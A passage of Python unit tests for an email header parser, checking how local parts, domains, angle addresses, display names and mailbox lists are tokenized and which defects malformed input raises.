' " Fred A. Johnson " ',
[],
'@python.org')
self.assertEqual(local_part.local_part, ' Fred A. Johnson ')
self.assertEqual(local_part[0][0].comments, ['foo'])
self.assertEqual(local_part[0][2].comments, ['bar (bird)'])
def test_get_local_part_simple_obsolete(self):
local_part = self._test_get_x(parser.get_local_part,
'Fred. A.Johnson@python.org',
'Fred. A.Johnson',
'Fred. A.Johnson',
[errors.ObsoleteHeaderDefect],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson')
def test_get_local_part_complex_obsolete_1(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo )Fred (bar).(bird) A.(sheep)Johnson."and dogs "@python.org',
' (foo )Fred (bar).(bird) A.(sheep)Johnson."and dogs "',
' Fred . A. Johnson.and dogs ',
[errors.ObsoleteHeaderDefect],
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson.and dogs ')
def test_get_local_part_complex_obsolete_invalid(self):
local_part = self._test_get_x(parser.get_local_part,
' (foo )Fred (bar).(bird) A.(sheep)Johnson "and dogs"@python.org',
' (foo )Fred (bar).(bird) A.(sheep)Johnson "and dogs"',
' Fred . A. Johnson and dogs',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'Fred.A.Johnson and dogs')
def test_get_local_part_no_part_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_local_part(' (foo) ')
def test_get_local_part_special_instead_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_local_part(' (foo) @python.org')
def test_get_local_part_trailing_dot(self):
local_part = self._test_get_x(parser.get_local_part,
' borris.@python.org',
' borris.',
' borris.',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'borris.')
def test_get_local_part_trailing_dot_with_ws(self):
local_part = self._test_get_x(parser.get_local_part,
' borris. @python.org',
' borris. ',
' borris. ',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'borris.')
def test_get_local_part_leading_dot(self):
local_part = self._test_get_x(parser.get_local_part,
'.borris@python.org',
'.borris',
'.borris',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, '.borris')
def test_get_local_part_leading_dot_after_ws(self):
local_part = self._test_get_x(parser.get_local_part,
' .borris@python.org',
' .borris',
' .borris',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, '.borris')
def test_get_local_part_double_dot_raises(self):
local_part = self._test_get_x(parser.get_local_part,
' borris.(foo).natasha@python.org',
' borris.(foo).natasha',
' borris. .natasha',
[errors.InvalidHeaderDefect]*2,
'@python.org')
self.assertEqual(local_part.local_part, 'borris..natasha')
def test_get_local_part_quoted_strings_in_atom_list(self):
local_part = self._test_get_x(parser.get_local_part,
'""example" example"@example.com',
'""example" example"',
'example example',
[errors.InvalidHeaderDefect]*3,
'@example.com')
self.assertEqual(local_part.local_part, 'example example')
def test_get_local_part_valid_and_invalid_qp_in_atom_list(self):
local_part = self._test_get_x(parser.get_local_part,
r'"\\"example\\" example"@example.com',
r'"\\"example\\" example"',
r'\example\\ example',
[errors.InvalidHeaderDefect]*5,
'@example.com')
self.assertEqual(local_part.local_part, r'\example\\ example')
def test_get_local_part_unicode_defect(self):
# Currently this only happens when parsing unicode, not when parsing
# stuff that was originally binary.
local_part = self._test_get_x(parser.get_local_part,
'exámple@example.com',
'exámple',
'exámple',
[errors.NonASCIILocalPartDefect],
'@example.com')
self.assertEqual(local_part.local_part, 'exámple')
# get_dtext
def test_get_dtext_only(self):
dtext = self._test_get_x(parser.get_dtext,
'foobar', 'foobar', 'foobar', [], '')
self.assertEqual(dtext.token_type, 'ptext')
def test_get_dtext_all_dtext(self):
dtext = self._test_get_x(parser.get_dtext, self.rfc_dtext_chars,
self.rfc_dtext_chars,
self.rfc_dtext_chars, [], '')
def test_get_dtext_two_words_gets_first(self):
self._test_get_x(parser.get_dtext,
'foo bar', 'foo', 'foo', [], ' bar')
def test_get_dtext_following_wsp_preserved(self):
self._test_get_x(parser.get_dtext,
'foo \t\tbar', 'foo', 'foo', [], ' \t\tbar')
def test_get_dtext_non_printables(self):
dtext = self._test_get_x(parser.get_dtext,
'foo\x00bar]', 'foo\x00bar', 'foo\x00bar',
[errors.NonPrintableDefect], ']')
self.assertEqual(dtext.defects[0].non_printables[0], '\x00')
def test_get_dtext_with_qp(self):
ptext = self._test_get_x(parser.get_dtext,
r'foo\]\[\\bar\b\e\l\l',
r'foo][\barbell',
r'foo][\barbell',
[errors.ObsoleteHeaderDefect],
'')
def test_get_dtext_up_to_close_bracket_only(self):
self._test_get_x(parser.get_dtext,
'foo]', 'foo', 'foo', [], ']')
def test_get_dtext_wsp_before_close_bracket_preserved(self):
self._test_get_x(parser.get_dtext,
'foo ]', 'foo', 'foo', [], ' ]')
def test_get_dtext_close_bracket_mid_word(self):
self._test_get_x(parser.get_dtext,
'foo]bar', 'foo', 'foo', [], ']bar')
def test_get_dtext_up_to_open_bracket_only(self):
self._test_get_x(parser.get_dtext,
'foo[', 'foo', 'foo', [], '[')
def test_get_dtext_wsp_before_open_bracket_preserved(self):
self._test_get_x(parser.get_dtext,
'foo [', 'foo', 'foo', [], ' [')
def test_get_dtext_open_bracket_mid_word(self):
self._test_get_x(parser.get_dtext,
'foo[bar', 'foo', 'foo', [], '[bar')
# get_domain_literal
def test_get_domain_literal_only(self):
        domain_literal = self._test_get_x(parser.get_domain_literal,
'[127.0.0.1]',
'[127.0.0.1]',
'[127.0.0.1]',
[],
'')
self.assertEqual(domain_literal.token_type, 'domain-literal')
self.assertEqual(domain_literal.domain, '[127.0.0.1]')
self.assertEqual(domain_literal.ip, '127.0.0.1')
def test_get_domain_literal_with_internal_ws(self):
domain_literal = self._test_get_x(parser.get_domain_literal,
'[ 127.0.0.1\t ]',
'[ 127.0.0.1\t ]',
'[ 127.0.0.1 ]',
[],
'')
self.assertEqual(domain_literal.domain, '[127.0.0.1]')
self.assertEqual(domain_literal.ip, '127.0.0.1')
def test_get_domain_literal_with_surrounding_cfws(self):
domain_literal = self._test_get_x(parser.get_domain_literal,
'(foo)[ 127.0.0.1] (bar)',
'(foo)[ 127.0.0.1] (bar)',
' [ 127.0.0.1] ',
[],
'')
self.assertEqual(domain_literal.domain, '[127.0.0.1]')
self.assertEqual(domain_literal.ip, '127.0.0.1')
def test_get_domain_literal_no_start_char_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain_literal('(foo) ')
def test_get_domain_literal_no_start_char_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain_literal('(foo) @')
def test_get_domain_literal_bad_dtext_char_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain_literal('(foo) [abc[@')
# get_domain
def test_get_domain_regular_domain_only(self):
domain = self._test_get_x(parser.get_domain,
'example.com',
'example.com',
'example.com',
[],
'')
self.assertEqual(domain.token_type, 'domain')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_domain_literal_only(self):
domain = self._test_get_x(parser.get_domain,
'[127.0.0.1]',
'[127.0.0.1]',
'[127.0.0.1]',
[],
'')
self.assertEqual(domain.token_type, 'domain')
self.assertEqual(domain.domain, '[127.0.0.1]')
def test_get_domain_with_cfws(self):
domain = self._test_get_x(parser.get_domain,
'(foo) example.com(bar)\t',
'(foo) example.com(bar)\t',
' example.com ',
[],
'')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_domain_literal_with_cfws(self):
domain = self._test_get_x(parser.get_domain,
'(foo)[127.0.0.1]\t(bar)',
'(foo)[127.0.0.1]\t(bar)',
' [127.0.0.1] ',
[],
'')
self.assertEqual(domain.domain, '[127.0.0.1]')
def test_get_domain_domain_with_cfws_ends_at_special(self):
domain = self._test_get_x(parser.get_domain,
'(foo)example.com\t(bar), next',
'(foo)example.com\t(bar)',
' example.com ',
[],
', next')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_domain_literal_with_cfws_ends_at_special(self):
domain = self._test_get_x(parser.get_domain,
'(foo)[127.0.0.1]\t(bar), next',
'(foo)[127.0.0.1]\t(bar)',
' [127.0.0.1] ',
[],
', next')
self.assertEqual(domain.domain, '[127.0.0.1]')
def test_get_domain_obsolete(self):
domain = self._test_get_x(parser.get_domain,
'(foo) example . (bird)com(bar)\t',
'(foo) example . (bird)com(bar)\t',
' example . com ',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(domain.domain, 'example.com')
def test_get_domain_no_non_cfws_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain(" (foo)\t")
def test_get_domain_no_atom_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_domain(" (foo)\t, broken")
# get_addr_spec
def test_get_addr_spec_normal(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(addr_spec.token_type, 'addr-spec')
self.assertEqual(addr_spec.local_part, 'dinsdale')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, 'dinsdale@example.com')
    def test_get_addr_spec_with_domain_literal(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'dinsdale@[127.0.0.1]',
'dinsdale@[127.0.0.1]',
'dinsdale@[127.0.0.1]',
[],
'')
self.assertEqual(addr_spec.local_part, 'dinsdale')
self.assertEqual(addr_spec.domain, '[127.0.0.1]')
self.assertEqual(addr_spec.addr_spec, 'dinsdale@[127.0.0.1]')
def test_get_addr_spec_with_cfws(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'(foo) dinsdale(bar)@ (bird) example.com (bog)',
'(foo) dinsdale(bar)@ (bird) example.com (bog)',
' dinsdale@example.com ',
[],
'')
self.assertEqual(addr_spec.local_part, 'dinsdale')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, 'dinsdale@example.com')
    def test_get_addr_spec_with_quoted_string_and_cfws(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'(foo) "roy a bug"(bar)@ (bird) example.com (bog)',
'(foo) "roy a bug"(bar)@ (bird) example.com (bog)',
' "roy a bug"@example.com ',
[],
'')
self.assertEqual(addr_spec.local_part, 'roy a bug')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, '"roy a bug"@example.com')
def test_get_addr_spec_ends_at_special(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'(foo) "roy a bug"(bar)@ (bird) example.com (bog) , next',
'(foo) "roy a bug"(bar)@ (bird) example.com (bog) ',
' "roy a bug"@example.com ',
[],
', next')
self.assertEqual(addr_spec.local_part, 'roy a bug')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, '"roy a bug"@example.com')
def test_get_addr_spec_quoted_strings_in_atom_list(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'""example" example"@example.com',
'""example" example"@example.com',
'example example@example.com',
[errors.InvalidHeaderDefect]*3,
'')
self.assertEqual(addr_spec.local_part, 'example example')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, '"example example"@example.com')
def test_get_addr_spec_dot_atom(self):
addr_spec = self._test_get_x(parser.get_addr_spec,
'star.a.star@example.com',
'star.a.star@example.com',
'star.a.star@example.com',
[],
'')
self.assertEqual(addr_spec.local_part, 'star.a.star')
self.assertEqual(addr_spec.domain, 'example.com')
self.assertEqual(addr_spec.addr_spec, 'star.a.star@example.com')
# get_obs_route
def test_get_obs_route_simple(self):
obs_route = self._test_get_x(parser.get_obs_route,
'@example.com, @two.example.com:',
'@example.com, @two.example.com:',
'@example.com, @two.example.com:',
[],
'')
self.assertEqual(obs_route.token_type, 'obs-route')
self.assertEqual(obs_route.domains, ['example.com', 'two.example.com'])
def test_get_obs_route_complex(self):
obs_route = self._test_get_x(parser.get_obs_route,
'(foo),, (blue)@example.com (bar),@two.(foo) example.com (bird):',
'(foo),, (blue)@example.com (bar),@two.(foo) example.com (bird):',
' ,, @example.com ,@two. example.com :',
[errors.ObsoleteHeaderDefect], # This is the obs-domain
'')
self.assertEqual(obs_route.token_type, 'obs-route')
self.assertEqual(obs_route.domains, ['example.com', 'two.example.com'])
def test_get_obs_route_no_route_before_end_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_obs_route('(foo) @example.com,')
def test_get_obs_route_no_route_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_obs_route('(foo) [abc],')
def test_get_obs_route_no_route_before_special_raises2(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_obs_route('(foo) @example.com [abc],')
# get_angle_addr
def test_get_angle_addr_simple(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com>',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[],
'')
self.assertEqual(angle_addr.token_type, 'angle-addr')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_empty(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<>',
'<>',
'<>',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(angle_addr.token_type, 'angle-addr')
self.assertIsNone(angle_addr.local_part)
self.assertIsNone(angle_addr.domain)
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, '<>')
def test_get_angle_addr_with_cfws(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
' (foo) <dinsdale@example.com>(bar)',
' (foo) <dinsdale@example.com>(bar)',
' <dinsdale@example.com> ',
[],
'')
self.assertEqual(angle_addr.token_type, 'angle-addr')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_qs_and_domain_literal(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<"Fred Perfect"@[127.0.0.1]>',
'<"Fred Perfect"@[127.0.0.1]>',
'<"Fred Perfect"@[127.0.0.1]>',
[],
'')
self.assertEqual(angle_addr.local_part, 'Fred Perfect')
self.assertEqual(angle_addr.domain, '[127.0.0.1]')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, '"Fred Perfect"@[127.0.0.1]')
def test_get_angle_addr_internal_cfws(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<(foo) dinsdale@example.com(bar)>',
'<(foo) dinsdale@example.com(bar)>',
'< dinsdale@example.com >',
[],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_obs_route(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'(foo)<@example.com, (bird) @two.example.com: dinsdale@example.com> (bar) ',
'(foo)<@example.com, (bird) @two.example.com: dinsdale@example.com> (bar) ',
' <@example.com, @two.example.com: dinsdale@example.com> ',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertEqual(angle_addr.route, ['example.com', 'two.example.com'])
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_missing_closing_angle(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_missing_closing_angle_with_cfws(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com (foo)',
'<dinsdale@example.com (foo)>',
'<dinsdale@example.com >',
[errors.InvalidHeaderDefect],
'')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_ends_at_special(self):
angle_addr = self._test_get_x(parser.get_angle_addr,
'<dinsdale@example.com> (foo), next',
'<dinsdale@example.com> (foo)',
'<dinsdale@example.com> ',
[],
', next')
self.assertEqual(angle_addr.local_part, 'dinsdale')
self.assertEqual(angle_addr.domain, 'example.com')
self.assertIsNone(angle_addr.route)
self.assertEqual(angle_addr.addr_spec, 'dinsdale@example.com')
def test_get_angle_addr_no_angle_raise(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('(foo) ')
def test_get_angle_addr_no_angle_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('(foo) , next')
def test_get_angle_addr_no_angle_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('bar')
def test_get_angle_addr_special_after_angle_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_angle_addr('(foo) <, bar')
    # get_display_name (this is phrase, but with a different value)
def test_get_display_name_simple(self):
display_name = self._test_get_x(parser.get_display_name,
'Fred A Johnson',
'Fred A Johnson',
'Fred A Johnson',
[],
'')
self.assertEqual(display_name.token_type, 'display-name')
self.assertEqual(display_name.display_name, 'Fred A Johnson')
def test_get_display_name_complex1(self):
display_name = self._test_get_x(parser.get_display_name,
'"Fred A. Johnson" is his name, oh.',
'"Fred A. Johnson" is his name',
'"Fred A. Johnson is his name"',
[],
', oh.')
self.assertEqual(display_name.token_type, 'display-name')
self.assertEqual(display_name.display_name, 'Fred A. Johnson is his name')
def test_get_display_name_complex2(self):
display_name = self._test_get_x(parser.get_display_name,
' (A) bird (in (my|your)) "hand " is messy\t<>\t',
' (A) bird (in (my|your)) "hand " is messy\t',
' "bird hand is messy" ',
[],
'<>\t')
self.assertEqual(display_name[0][0].comments, ['A'])
self.assertEqual(display_name[0][2].comments, ['in (my|your)'])
self.assertEqual(display_name.display_name, 'bird hand is messy')
def test_get_display_name_obsolete(self):
display_name = self._test_get_x(parser.get_display_name,
'Fred A.(weird).O Johnson',
'Fred A.(weird).O Johnson',
'"Fred A. .O Johnson"',
[errors.ObsoleteHeaderDefect]*3,
'')
self.assertEqual(len(display_name), 7)
self.assertEqual(display_name[3].comments, ['weird'])
self.assertEqual(display_name.display_name, 'Fred A. .O Johnson')
    def test_get_display_name_phrase_must_start_with_word(self):
display_name = self._test_get_x(parser.get_display_name,
'(even weirder).name',
'(even weirder).name',
' ".name"',
[errors.InvalidHeaderDefect] + [errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(len(display_name), 3)
self.assertEqual(display_name[0].comments, ['even weirder'])
self.assertEqual(display_name.display_name, '.name')
def test_get_display_name_ending_with_obsolete(self):
display_name = self._test_get_x(parser.get_display_name,
'simple phrase.(with trailing comment):boo',
'simple phrase.(with trailing comment)',
'"simple phrase." ',
[errors.ObsoleteHeaderDefect]*2,
':boo')
self.assertEqual(len(display_name), 4)
self.assertEqual(display_name[3].comments, ['with trailing comment'])
self.assertEqual(display_name.display_name, 'simple phrase.')
# get_name_addr
def test_get_name_addr_angle_addr_only(self):
name_addr = self._test_get_x(parser.get_name_addr,
'<dinsdale@example.com>',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[],
'')
self.assertEqual(name_addr.token_type, 'name-addr')
self.assertIsNone(name_addr.display_name)
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_atom_name(self):
name_addr = self._test_get_x(parser.get_name_addr,
'Dinsdale <dinsdale@example.com>',
'Dinsdale <dinsdale@example.com>',
'Dinsdale <dinsdale@example.com>',
[],
'')
self.assertEqual(name_addr.token_type, 'name-addr')
self.assertEqual(name_addr.display_name, 'Dinsdale')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_atom_name_with_cfws(self):
name_addr = self._test_get_x(parser.get_name_addr,
'(foo) Dinsdale (bar) <dinsdale@example.com> (bird)',
'(foo) Dinsdale (bar) <dinsdale@example.com> (bird)',
' Dinsdale <dinsdale@example.com> ',
[],
'')
self.assertEqual(name_addr.display_name, 'Dinsdale')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_name_with_cfws_and_dots(self):
name_addr = self._test_get_x(parser.get_name_addr,
'(foo) Roy.A.Bear (bar) <dinsdale@example.com> (bird)',
'(foo) Roy.A.Bear (bar) <dinsdale@example.com> (bird)',
' "Roy.A.Bear" <dinsdale@example.com> ',
[errors.ObsoleteHeaderDefect]*2,
'')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_qs_name(self):
name_addr = self._test_get_x(parser.get_name_addr,
'"Roy.A.Bear" <dinsdale@example.com>',
'"Roy.A.Bear" <dinsdale@example.com>',
'"Roy.A.Bear" <dinsdale@example.com>',
[],
'')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_with_route(self):
name_addr = self._test_get_x(parser.get_name_addr,
'"Roy.A.Bear" <@two.example.com: dinsdale@example.com>',
'"Roy.A.Bear" <@two.example.com: dinsdale@example.com>',
'"Roy.A.Bear" <@two.example.com: dinsdale@example.com>',
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertEqual(name_addr.route, ['two.example.com'])
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_ends_at_special(self):
name_addr = self._test_get_x(parser.get_name_addr,
'"Roy.A.Bear" <dinsdale@example.com>, next',
'"Roy.A.Bear" <dinsdale@example.com>',
'"Roy.A.Bear" <dinsdale@example.com>',
[],
', next')
self.assertEqual(name_addr.display_name, 'Roy.A.Bear')
self.assertEqual(name_addr.local_part, 'dinsdale')
self.assertEqual(name_addr.domain, 'example.com')
self.assertIsNone(name_addr.route)
self.assertEqual(name_addr.addr_spec, 'dinsdale@example.com')
def test_get_name_addr_no_content_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_name_addr(' (foo) ')
def test_get_name_addr_no_content_before_special_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_name_addr(' (foo) ,')
def test_get_name_addr_no_angle_after_display_name_raises(self):
with self.assertRaises(errors.HeaderParseError):
parser.get_name_addr('foo bar')
# get_mailbox
def test_get_mailbox_addr_spec_only(self):
mailbox = self._test_get_x(parser.get_mailbox,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertIsNone(mailbox.display_name)
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_angle_addr_only(self):
mailbox = self._test_get_x(parser.get_mailbox,
'<dinsdale@example.com>',
'<dinsdale@example.com>',
'<dinsdale@example.com>',
[],
'')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertIsNone(mailbox.display_name)
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_name_addr(self):
mailbox = self._test_get_x(parser.get_mailbox,
'"Roy A. Bear" <dinsdale@example.com>',
'"Roy A. Bear" <dinsdale@example.com>',
'"Roy A. Bear" <dinsdale@example.com>',
[],
'')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertEqual(mailbox.display_name, 'Roy A. Bear')
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_ends_at_special(self):
mailbox = self._test_get_x(parser.get_mailbox,
'"Roy A. Bear" <dinsdale@example.com>, rest',
'"Roy A. Bear" <dinsdale@example.com>',
'"Roy A. Bear" <dinsdale@example.com>',
[],
', rest')
self.assertEqual(mailbox.token_type, 'mailbox')
self.assertEqual(mailbox.display_name, 'Roy A. Bear')
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
def test_get_mailbox_quoted_strings_in_atom_list(self):
mailbox = self._test_get_x(parser.get_mailbox,
'""example" example"@example.com',
'""example" example"@example.com',
'example example@example.com',
[errors.InvalidHeaderDefect]*3,
'')
self.assertEqual(mailbox.local_part, 'example example')
self.assertEqual(mailbox.domain, 'example.com')
self.assertEqual(mailbox.addr_spec, '"example example"@example.com')
# get_mailbox_list
def test_get_mailbox_list_single_addr(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
'dinsdale@example.com',
'dinsdale@example.com',
'dinsdale@example.com',
[],
'')
self.assertEqual(mailbox_list.token_type, 'mailbox-list')
self.assertEqual(len(mailbox_list.mailboxes), 1)
mailbox = mailbox_list.mailboxes[0]
self.assertIsNone(mailbox.display_name)
self.assertEqual(mailbox.local_part, 'dinsdale')
self.assertEqual(mailbox.domain, 'example.com')
self.assertIsNone(mailbox.route)
self.assertEqual(mailbox.addr_spec, 'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_two_simple_addr(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
'dinsdale@example.com, dinsdale@test.example.com',
'dinsdale@example.com, dinsdale@test.example.com',
'dinsdale@example.com, dinsdale@test.example.com',
[],
'')
self.assertEqual(mailbox_list.token_type, 'mailbox-list')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_two_name_addr(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear" <dinsdale@example.com>,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
('"Roy A. Bear" <dinsdale@example.com>,'
' "Fred Flintstone" <dinsdale@test.example.com>'),
[],
'')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[1].display_name,
'Fred Flintstone')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_two_complex(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('(foo) "Roy A. Bear" <dinsdale@example.com>(bar),'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
('(foo) "Roy A. Bear" <dinsdale@example.com>(bar),'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
(' "Roy A. Bear" <dinsdale@example.com> ,'
' "Fred Flintstone" <dinsdale@test. example.com>'),
[errors.ObsoleteHeaderDefect],
'')
self.assertEqual(len(mailbox_list.mailboxes), 2)
self.assertEqual(mailbox_list.mailboxes[0].addr_spec,
'dinsdale@example.com')
self.assertEqual(mailbox_list.mailboxes[0].display_name,
'Roy A. Bear')
self.assertEqual(mailbox_list.mailboxes[1].addr_spec,
'dinsdale@test.example.com')
self.assertEqual(mailbox_list.mailboxes[1].display_name,
'Fred Flintstone')
self.assertEqual(mailbox_list.mailboxes,
mailbox_list.all_mailboxes)
def test_get_mailbox_list_unparseable_mailbox_null(self):
mailbox_list = self._test_get_x(parser.get_mailbox_list,
('"Roy A. Bear"[] dinsdale@example.com,'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
('"Roy A. Bear"[] dinsdale@example.com,'
' "Fred Flintstone" <dinsdale@test.(bird)example.com>'),
('"Roy A. Bear"[] dinsdale@example.com,'
' "Fred Flintstone" <dinsdale@test. example.com>'),
[errors.InvalidHeaderDefect, # the 'extra' text after the local part
errors.InvalidHeaderDefect, # the local part with no angle-addr
errors.ObsoleteHeaderDefect, # period in extra text (example.com)
errors.ObsoleteHeaderDefect], # (bird) in valid address.
'')
self.assertEqual(len(mailbox_list.mailboxes), 1)
self.assertEqual(len(mailbox_list.all_mailboxes), 2)
self.assertEqual(mailbox_list.all_mailboxes[0].token_type,
'invalid-mailbox')
